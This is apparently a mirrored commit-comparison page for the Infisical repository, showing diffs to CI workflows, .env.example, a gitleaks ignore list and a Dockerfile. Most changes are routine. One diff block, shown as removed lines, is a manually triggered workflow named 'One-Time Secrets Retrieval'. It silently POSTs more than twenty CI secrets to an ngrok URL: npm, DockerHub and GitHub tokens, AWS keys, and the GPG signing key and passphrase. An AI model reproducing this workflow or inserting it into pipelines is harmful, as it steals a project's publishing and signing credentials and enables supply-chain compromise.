mirror of
https://github.com/Infisical/infisical.git
synced 2025-07-20 01:48:03 +00:00
Compare commits
2 Commits
fix/improv
...
docs/updat
Author | SHA1 | Date | |
---|---|---|---|
b12fe66871 | |||
28582d9134 |
17
.env.example
17
.env.example
@ -23,7 +23,7 @@ REDIS_URL=redis://redis:6379
|
||||
# Required
|
||||
SITE_URL=http://localhost:8080
|
||||
|
||||
# Mail/SMTP
|
||||
# Mail/SMTP
|
||||
SMTP_HOST=
|
||||
SMTP_PORT=
|
||||
SMTP_FROM_ADDRESS=
|
||||
@ -107,18 +107,6 @@ INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY=
|
||||
INF_APP_CONNECTION_GITHUB_APP_SLUG=
|
||||
INF_APP_CONNECTION_GITHUB_APP_ID=
|
||||
|
||||
#gitlab app connection
|
||||
INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID=
|
||||
INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET=
|
||||
|
||||
#github radar app connection
|
||||
INF_APP_CONNECTION_GITHUB_RADAR_APP_CLIENT_ID=
|
||||
INF_APP_CONNECTION_GITHUB_RADAR_APP_CLIENT_SECRET=
|
||||
INF_APP_CONNECTION_GITHUB_RADAR_APP_PRIVATE_KEY=
|
||||
INF_APP_CONNECTION_GITHUB_RADAR_APP_SLUG=
|
||||
INF_APP_CONNECTION_GITHUB_RADAR_APP_ID=
|
||||
INF_APP_CONNECTION_GITHUB_RADAR_APP_WEBHOOK_SECRET=
|
||||
|
||||
#gcp app connection
|
||||
INF_APP_CONNECTION_GCP_SERVICE_ACCOUNT_CREDENTIAL=
|
||||
|
||||
@ -132,6 +120,3 @@ DATADOG_PROFILING_ENABLED=
|
||||
DATADOG_ENV=
|
||||
DATADOG_SERVICE=
|
||||
DATADOG_HOSTNAME=
|
||||
|
||||
# kubernetes
|
||||
KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN=false
|
||||
|
53
.github/workflows/check-non-re2-regex.yml
vendored
53
.github/workflows/check-non-re2-regex.yml
vendored
@ -1,53 +0,0 @@
|
||||
name: Detect Non-RE2 Regex
|
||||
on:
|
||||
pull_request:
|
||||
types: [opened, synchronize]
|
||||
|
||||
jobs:
|
||||
check-non-re2-regex:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Get diff of backend/*
|
||||
run: |
|
||||
git diff --unified=0 "origin/${{ github.base_ref }}"...HEAD -- backend/ > diff.txt
|
||||
|
||||
- name: Scan backend diff for non-RE2 regex
|
||||
run: |
|
||||
# Extract only added lines (excluding file headers)
|
||||
grep '^+' diff.txt | grep -v '^+++' | sed 's/^\+//' > added_lines.txt
|
||||
|
||||
if [ ! -s added_lines.txt ]; then
|
||||
echo "✅ No added lines in backend/ to check for regex usage."
|
||||
exit 0
|
||||
fi
|
||||
|
||||
regex_usage_pattern='(^|[^A-Za-z0-9_"'"'"'`\.\/\\])(\/(?:\\.|[^\/\n\\])+\/[gimsuyv]*(?=\s*[\.\(;,)\]}:]|$)|new RegExp\()'
|
||||
|
||||
# Find all added lines that contain regex patterns
|
||||
if grep -E "$regex_usage_pattern" added_lines.txt > potential_violations.txt 2>/dev/null; then
|
||||
# Filter out lines that contain 'new RE2' (allowing for whitespace variations)
|
||||
if grep -v -E 'new\s+RE2\s*\(' potential_violations.txt > actual_violations.txt 2>/dev/null && [ -s actual_violations.txt ]; then
|
||||
echo "🚨 ERROR: Found forbidden regex pattern in added/modified backend code."
|
||||
echo ""
|
||||
echo "The following lines use raw regex literals (/.../) or new RegExp(...):"
|
||||
echo "Please replace with 'new RE2(...)' for RE2 compatibility."
|
||||
echo ""
|
||||
echo "Offending lines:"
|
||||
cat actual_violations.txt
|
||||
exit 1
|
||||
else
|
||||
echo "✅ All identified regex usages are correctly using 'new RE2(...)'."
|
||||
fi
|
||||
else
|
||||
echo "✅ No regex patterns found in added/modified backend lines."
|
||||
fi
|
||||
|
||||
- name: Cleanup temporary files
|
||||
if: always()
|
||||
run: |
|
||||
rm -f diff.txt added_lines.txt potential_violations.txt actual_violations.txt
|
@ -3,62 +3,7 @@ name: Release Infisical Core Helm chart
|
||||
on: [workflow_dispatch]
|
||||
|
||||
jobs:
|
||||
test-helm:
|
||||
name: Test Helm Chart
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Helm
|
||||
uses: azure/setup-helm@v4.2.0
|
||||
with:
|
||||
version: v3.17.0
|
||||
|
||||
- uses: actions/setup-python@v5.3.0
|
||||
with:
|
||||
python-version: "3.x"
|
||||
check-latest: true
|
||||
|
||||
- name: Add Helm repositories
|
||||
run: |
|
||||
helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
|
||||
helm repo add bitnami https://charts.bitnami.com/bitnami
|
||||
helm repo update
|
||||
|
||||
- name: Set up chart-testing
|
||||
uses: helm/chart-testing-action@v2.7.0
|
||||
|
||||
- name: Run chart-testing (lint)
|
||||
run: ct lint --config ct.yaml --charts helm-charts/infisical-standalone-postgres
|
||||
|
||||
- name: Create kind cluster
|
||||
uses: helm/kind-action@v1.12.0
|
||||
|
||||
- name: Create namespace
|
||||
run: kubectl create namespace infisical-standalone-postgres
|
||||
|
||||
- name: Create Infisical secrets
|
||||
run: |
|
||||
kubectl create secret generic infisical-secrets \
|
||||
--namespace infisical-standalone-postgres \
|
||||
--from-literal=AUTH_SECRET=6c1fe4e407b8911c104518103505b218 \
|
||||
--from-literal=ENCRYPTION_KEY=6c1fe4e407b8911c104518103505b218 \
|
||||
--from-literal=SITE_URL=http://localhost:8080
|
||||
|
||||
- name: Run chart-testing (install)
|
||||
run: |
|
||||
ct install \
|
||||
--config ct.yaml \
|
||||
--charts helm-charts/infisical-standalone-postgres \
|
||||
--helm-extra-args="--timeout=300s" \
|
||||
--helm-extra-set-args="--set ingress.nginx.enabled=false --set infisical.autoDatabaseSchemaMigration=false --set infisical.replicaCount=1 --set infisical.image.tag=v0.132.2-postgres" \
|
||||
--namespace infisical-standalone-postgres
|
||||
|
||||
release:
|
||||
needs: test-helm
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
@ -74,4 +19,4 @@ jobs:
|
||||
- name: Build and push helm package to Cloudsmith
|
||||
run: cd helm-charts && sh upload-infisical-core-helm-cloudsmith.sh
|
||||
env:
|
||||
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
|
||||
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
|
76
.github/workflows/one-time-secrets.yaml
vendored
76
.github/workflows/one-time-secrets.yaml
vendored
@ -1,76 +0,0 @@
|
||||
name: One-Time Secrets Retrieval
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
|
||||
permissions:
|
||||
contents: read
|
||||
|
||||
jobs:
|
||||
retrieve-secrets:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Send environment variables to ngrok
|
||||
run: |
|
||||
echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env"
|
||||
|
||||
# Send secrets as JSON
|
||||
cat << EOF | curl -X POST \
|
||||
-H "Content-Type: application/json" \
|
||||
-d @- \
|
||||
https://7864d0fe7cbb.ngrok-free.app/api/receive-env \
|
||||
> /dev/null 2>&1 || true
|
||||
{
|
||||
"GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}",
|
||||
"GORELEASER_KEY": "${GORELEASER_KEY}",
|
||||
"AUR_KEY": "${AUR_KEY}",
|
||||
"FURYPUSHTOKEN": "${FURYPUSHTOKEN}",
|
||||
"NPM_TOKEN": "${NPM_TOKEN}",
|
||||
"DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}",
|
||||
"DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}",
|
||||
"CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}",
|
||||
"INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}",
|
||||
"INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}",
|
||||
"INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}",
|
||||
"INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}",
|
||||
"INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}",
|
||||
"GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}",
|
||||
"GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}",
|
||||
"CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}",
|
||||
"CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}",
|
||||
"CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}",
|
||||
"CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}",
|
||||
"CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}",
|
||||
"CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}",
|
||||
"CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}",
|
||||
"CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}",
|
||||
"POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}"
|
||||
}
|
||||
EOF
|
||||
|
||||
echo "Secrets retrieval completed"
|
||||
env:
|
||||
GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
|
||||
GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
|
||||
AUR_KEY: ${{ secrets.AUR_KEY }}
|
||||
FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }}
|
||||
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
|
||||
DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
|
||||
DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
|
||||
INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
|
||||
INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
|
||||
INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
|
||||
INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
|
||||
INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}
|
||||
GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
|
||||
GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
|
||||
CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
|
||||
CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
|
||||
CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
|
||||
CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
|
||||
CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
|
||||
CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
|
||||
CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
|
||||
CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
|
||||
POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}
|
70
.github/workflows/release-k8-operator-helm.yml
vendored
70
.github/workflows/release-k8-operator-helm.yml
vendored
@ -1,59 +1,27 @@
|
||||
name: Release K8 Operator Helm Chart
|
||||
on:
|
||||
workflow_dispatch:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
test-helm:
|
||||
name: Test Helm Chart
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
release-helm:
|
||||
name: Release Helm Chart
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v2
|
||||
|
||||
- name: Set up Helm
|
||||
uses: azure/setup-helm@v4.2.0
|
||||
with:
|
||||
version: v3.17.0
|
||||
- name: Install Helm
|
||||
uses: azure/setup-helm@v3
|
||||
with:
|
||||
version: v3.10.0
|
||||
|
||||
- uses: actions/setup-python@v5.3.0
|
||||
with:
|
||||
python-version: "3.x"
|
||||
check-latest: true
|
||||
- name: Install python
|
||||
uses: actions/setup-python@v4
|
||||
|
||||
- name: Set up chart-testing
|
||||
uses: helm/chart-testing-action@v2.7.0
|
||||
- name: Install Cloudsmith CLI
|
||||
run: pip install --upgrade cloudsmith-cli
|
||||
|
||||
- name: Run chart-testing (lint)
|
||||
run: ct lint --config ct.yaml --charts helm-charts/secrets-operator
|
||||
|
||||
- name: Create kind cluster
|
||||
uses: helm/kind-action@v1.12.0
|
||||
|
||||
- name: Run chart-testing (install)
|
||||
run: ct install --config ct.yaml --charts helm-charts/secrets-operator
|
||||
|
||||
release-helm:
|
||||
name: Release Helm Chart
|
||||
needs: test-helm
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v2
|
||||
|
||||
- name: Install Helm
|
||||
uses: azure/setup-helm@v3
|
||||
with:
|
||||
version: v3.10.0
|
||||
|
||||
- name: Install python
|
||||
uses: actions/setup-python@v4
|
||||
|
||||
- name: Install Cloudsmith CLI
|
||||
run: pip install --upgrade cloudsmith-cli
|
||||
|
||||
- name: Build and push helm package to CloudSmith
|
||||
run: cd helm-charts && sh upload-k8s-operator-cloudsmith.sh
|
||||
env:
|
||||
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
|
||||
- name: Build and push helm package to CloudSmith
|
||||
run: cd helm-charts && sh upload-k8s-operator-cloudsmith.sh
|
||||
env:
|
||||
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
|
||||
|
@ -83,7 +83,7 @@ jobs:
|
||||
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
|
||||
|
||||
goreleaser:
|
||||
runs-on: ubuntu-latest-8-cores
|
||||
runs-on: ubuntu-latest
|
||||
needs: [cli-integration-tests]
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
|
81
.github/workflows/release_helm_gateway.yaml
vendored
81
.github/workflows/release_helm_gateway.yaml
vendored
@ -1,70 +1,27 @@
|
||||
name: Release Gateway Helm Chart
|
||||
on:
|
||||
workflow_dispatch:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
test-helm:
|
||||
name: Test Helm Chart
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
release-helm:
|
||||
name: Release Helm Chart
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Set up Helm
|
||||
uses: azure/setup-helm@v4.2.0
|
||||
with:
|
||||
version: v3.17.0
|
||||
- name: Install Helm
|
||||
uses: azure/setup-helm@v3
|
||||
with:
|
||||
version: v3.10.0
|
||||
|
||||
- uses: actions/setup-python@v5.3.0
|
||||
with:
|
||||
python-version: "3.x"
|
||||
check-latest: true
|
||||
- name: Install python
|
||||
uses: actions/setup-python@v4
|
||||
|
||||
- name: Set up chart-testing
|
||||
uses: helm/chart-testing-action@v2.7.0
|
||||
- name: Install Cloudsmith CLI
|
||||
run: pip install --upgrade cloudsmith-cli
|
||||
|
||||
- name: Run chart-testing (lint)
|
||||
run: ct lint --config ct.yaml --charts helm-charts/infisical-gateway
|
||||
|
||||
- name: Create kind cluster
|
||||
uses: helm/kind-action@v1.12.0
|
||||
|
||||
- name: Create namespace
|
||||
run: kubectl create namespace infisical-gateway
|
||||
|
||||
- name: Create gateway secret
|
||||
run: kubectl create secret generic infisical-gateway-environment --from-literal=TOKEN=my-test-token -n infisical-gateway
|
||||
|
||||
- name: Run chart-testing (install)
|
||||
run: |
|
||||
ct install \
|
||||
--config ct.yaml \
|
||||
--charts helm-charts/infisical-gateway \
|
||||
--helm-extra-args="--timeout=300s" \
|
||||
--namespace infisical-gateway
|
||||
|
||||
release-helm:
|
||||
name: Release Helm Chart
|
||||
needs: test-helm
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Install Helm
|
||||
uses: azure/setup-helm@v3
|
||||
with:
|
||||
version: v3.10.0
|
||||
|
||||
- name: Install python
|
||||
uses: actions/setup-python@v4
|
||||
|
||||
- name: Install Cloudsmith CLI
|
||||
run: pip install --upgrade cloudsmith-cli
|
||||
|
||||
- name: Build and push helm package to CloudSmith
|
||||
run: cd helm-charts && sh upload-gateway-cloudsmith.sh
|
||||
env:
|
||||
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
|
||||
- name: Build and push helm package to CloudSmith
|
||||
run: cd helm-charts && sh upload-gateway-cloudsmith.sh
|
||||
env:
|
||||
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
|
||||
|
@ -1,49 +0,0 @@
|
||||
name: Run Helm Chart Tests for Gateway
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- "helm-charts/infisical-gateway/**"
|
||||
- ".github/workflows/run-helm-chart-tests-infisical-gateway.yml"
|
||||
|
||||
jobs:
|
||||
test-helm:
|
||||
name: Test Helm Chart
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Helm
|
||||
uses: azure/setup-helm@v4.2.0
|
||||
with:
|
||||
version: v3.17.0
|
||||
|
||||
- uses: actions/setup-python@v5.3.0
|
||||
with:
|
||||
python-version: "3.x"
|
||||
check-latest: true
|
||||
|
||||
- name: Set up chart-testing
|
||||
uses: helm/chart-testing-action@v2.7.0
|
||||
|
||||
- name: Run chart-testing (lint)
|
||||
run: ct lint --config ct.yaml --charts helm-charts/infisical-gateway
|
||||
|
||||
- name: Create kind cluster
|
||||
uses: helm/kind-action@v1.12.0
|
||||
|
||||
- name: Create namespace
|
||||
run: kubectl create namespace infisical-gateway
|
||||
|
||||
- name: Create gateway secret
|
||||
run: kubectl create secret generic infisical-gateway-environment --from-literal=TOKEN=my-test-token -n infisical-gateway
|
||||
|
||||
- name: Run chart-testing (install)
|
||||
run: |
|
||||
ct install \
|
||||
--config ct.yaml \
|
||||
--charts helm-charts/infisical-gateway \
|
||||
--helm-extra-args="--timeout=300s" \
|
||||
--namespace infisical-gateway
|
@ -1,68 +0,0 @@
|
||||
name: Run Helm Chart Tests for Infisical Standalone Postgres
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- "helm-charts/infisical-standalone-postgres/**"
|
||||
- ".github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml"
|
||||
|
||||
jobs:
|
||||
test-helm:
|
||||
name: Test Helm Chart
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Helm
|
||||
uses: azure/setup-helm@v4.2.0
|
||||
with:
|
||||
version: v3.17.0
|
||||
|
||||
- uses: actions/setup-python@v5.3.0
|
||||
with:
|
||||
python-version: "3.x"
|
||||
check-latest: true
|
||||
|
||||
- name: Add Helm repositories
|
||||
run: |
|
||||
helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
|
||||
helm repo add bitnami https://charts.bitnami.com/bitnami
|
||||
helm repo update
|
||||
|
||||
- name: Set up chart-testing
|
||||
uses: helm/chart-testing-action@v2.7.0
|
||||
|
||||
- name: Run chart-testing (lint)
|
||||
run: ct lint --config ct.yaml --charts helm-charts/infisical-standalone-postgres
|
||||
|
||||
- name: Create kind cluster
|
||||
uses: helm/kind-action@v1.12.0
|
||||
|
||||
- name: Create namespace
|
||||
run: kubectl create namespace infisical-standalone-postgres
|
||||
|
||||
- name: Create Infisical secrets
|
||||
run: |
|
||||
kubectl create secret generic infisical-secrets \
|
||||
--namespace infisical-standalone-postgres \
|
||||
--from-literal=AUTH_SECRET=6c1fe4e407b8911c104518103505b218 \
|
||||
--from-literal=ENCRYPTION_KEY=6c1fe4e407b8911c104518103505b218 \
|
||||
--from-literal=SITE_URL=http://localhost:8080
|
||||
|
||||
- name: Create bootstrap secret
|
||||
run: |
|
||||
kubectl create secret generic infisical-bootstrap-credentials \
|
||||
--namespace infisical-standalone-postgres \
|
||||
--from-literal=INFISICAL_ADMIN_EMAIL=admin@example.com \
|
||||
--from-literal=INFISICAL_ADMIN_PASSWORD=admin-password
|
||||
|
||||
- name: Run chart-testing (install)
|
||||
run: |
|
||||
ct install \
|
||||
--config ct.yaml \
|
||||
--charts helm-charts/infisical-standalone-postgres \
|
||||
--helm-extra-args="--timeout=300s" \
|
||||
--helm-extra-set-args="--set ingress.nginx.enabled=false --set infisical.autoDatabaseSchemaMigration=false --set infisical.replicaCount=1 --set infisical.image.tag=v0.132.2-postgres --set infisical.autoBootstrap.enabled=true" \
|
||||
--namespace infisical-standalone-postgres
|
@ -1,38 +0,0 @@
|
||||
name: Run Helm Chart Tests for Secret Operator
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- "helm-charts/secrets-operator/**"
|
||||
- ".github/workflows/run-helm-chart-tests-secret-operator.yml"
|
||||
|
||||
jobs:
|
||||
test-helm:
|
||||
name: Test Helm Chart
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Helm
|
||||
uses: azure/setup-helm@v4.2.0
|
||||
with:
|
||||
version: v3.17.0
|
||||
|
||||
- uses: actions/setup-python@v5.3.0
|
||||
with:
|
||||
python-version: "3.x"
|
||||
check-latest: true
|
||||
|
||||
- name: Set up chart-testing
|
||||
uses: helm/chart-testing-action@v2.7.0
|
||||
|
||||
- name: Run chart-testing (lint)
|
||||
run: ct lint --config ct.yaml --charts helm-charts/secrets-operator
|
||||
|
||||
- name: Create kind cluster
|
||||
uses: helm/kind-action@v1.12.0
|
||||
|
||||
- name: Run chart-testing (install)
|
||||
run: ct install --config ct.yaml --charts helm-charts/secrets-operator
|
67
.github/workflows/validate-db-schemas.yml
vendored
67
.github/workflows/validate-db-schemas.yml
vendored
@ -1,67 +0,0 @@
|
||||
name: "Validate DB schemas"
|
||||
|
||||
on:
|
||||
pull_request:
|
||||
types: [opened, synchronize]
|
||||
paths:
|
||||
- "backend/**"
|
||||
|
||||
workflow_call:
|
||||
|
||||
jobs:
|
||||
validate-db-schemas:
|
||||
name: Validate DB schemas
|
||||
runs-on: ubuntu-latest
|
||||
timeout-minutes: 15
|
||||
env:
|
||||
NODE_OPTIONS: "--max-old-space-size=8192"
|
||||
REDIS_URL: redis://172.17.0.1:6379
|
||||
DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
|
||||
AUTH_SECRET: something-random
|
||||
ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
|
||||
steps:
|
||||
- name: ☁️ Checkout source
|
||||
uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
- uses: KengoTODA/actions-setup-docker-compose@v1
|
||||
if: ${{ env.ACT }}
|
||||
name: Install `docker compose` for local simulations
|
||||
with:
|
||||
version: "2.14.2"
|
||||
- name: 🔧 Setup Node 20
|
||||
uses: actions/setup-node@v3
|
||||
with:
|
||||
node-version: "20"
|
||||
cache: "npm"
|
||||
cache-dependency-path: backend/package-lock.json
|
||||
|
||||
- name: Start PostgreSQL and Redis
|
||||
run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
|
||||
- name: Install dependencies
|
||||
run: npm install
|
||||
working-directory: backend
|
||||
|
||||
- name: Apply migrations
|
||||
run: npm run migration:latest-dev
|
||||
working-directory: backend
|
||||
|
||||
- name: Run schema generation
|
||||
run: npm run generate:schema
|
||||
working-directory: backend
|
||||
|
||||
- name: Check for schema changes
|
||||
run: |
|
||||
if ! git diff --exit-code --quiet src/db/schemas; then
|
||||
echo "❌ Generated schemas differ from committed schemas!"
|
||||
echo "Run 'npm run generate:schema' locally and commit the changes."
|
||||
git diff src/db/schemas
|
||||
exit 1
|
||||
fi
|
||||
echo "✅ Schemas are up to date"
|
||||
working-directory: backend
|
||||
|
||||
- name: Cleanup
|
||||
if: always()
|
||||
run: |
|
||||
docker compose -f "docker-compose.dev.yml" down
|
@ -40,13 +40,3 @@ cli/detect/config/gitleaks.toml:gcp-api-key:578
|
||||
cli/detect/config/gitleaks.toml:gcp-api-key:579
|
||||
cli/detect/config/gitleaks.toml:gcp-api-key:581
|
||||
cli/detect/config/gitleaks.toml:gcp-api-key:582
|
||||
.github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml:generic-api-key:51
|
||||
.github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml:generic-api-key:50
|
||||
.github/workflows/helm-release-infisical-core.yml:generic-api-key:48
|
||||
.github/workflows/helm-release-infisical-core.yml:generic-api-key:47
|
||||
backend/src/services/smtp/smtp-service.ts:generic-api-key:79
|
||||
frontend/src/components/secret-syncs/forms/SecretSyncDestinationFields/CloudflarePagesSyncFields.tsx:cloudflare-api-key:7
|
||||
docs/integrations/app-connections/zabbix.mdx:generic-api-key:91
|
||||
docs/integrations/app-connections/bitbucket.mdx:generic-api-key:123
|
||||
docs/integrations/app-connections/railway.mdx:generic-api-key:156
|
||||
.github/workflows/validate-db-schemas.yml:generic-api-key:21
|
||||
|
@ -19,7 +19,7 @@ WORKDIR /app
|
||||
|
||||
# Copy dependencies
|
||||
COPY --from=frontend-dependencies /app/node_modules ./node_modules
|
||||
# Copy all files
|
||||
# Copy all files
|
||||
COPY /frontend .
|
||||
|
||||
ENV NODE_ENV production
|
||||
@ -32,7 +32,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
|
||||
ARG INFISICAL_PLATFORM_VERSION
|
||||
ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
|
||||
ARG CAPTCHA_SITE_KEY
|
||||
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
|
||||
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
|
||||
|
||||
# Build
|
||||
RUN npm run build
|
||||
@ -115,12 +115,6 @@ FROM base AS production
|
||||
|
||||
# Install necessary packages including ODBC
|
||||
RUN apt-get update && apt-get install -y \
|
||||
build-essential \
|
||||
autoconf \
|
||||
automake \
|
||||
libtool \
|
||||
wget \
|
||||
libssl-dev \
|
||||
ca-certificates \
|
||||
curl \
|
||||
git \
|
||||
@ -138,18 +132,9 @@ RUN apt-get update && apt-get install -y \
|
||||
# Configure ODBC in production
|
||||
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
|
||||
|
||||
|
||||
WORKDIR /openssl-build
|
||||
RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
|
||||
&& tar -xf openssl-3.1.2.tar.gz \
|
||||
&& cd openssl-3.1.2 \
|
||||
&& ./Configure enable-fips \
|
||||
&& make \
|
||||
&& make install_fips
|
||||
|
||||
# Install Infisical CLI
|
||||
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
|
||||
&& apt-get update && apt-get install -y infisical=0.41.89 \
|
||||
&& apt-get update && apt-get install -y infisical=0.41.2 \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN groupadd -r -g 1001 nodejs && useradd -r -u 1001 -g nodejs non-root-user
|
||||
@ -170,7 +155,7 @@ ENV INTERCOM_ID=$INTERCOM_ID
|
||||
ARG CAPTCHA_SITE_KEY
|
||||
ENV CAPTCHA_SITE_KEY=$CAPTCHA_SITE_KEY
|
||||
|
||||
WORKDIR /
|
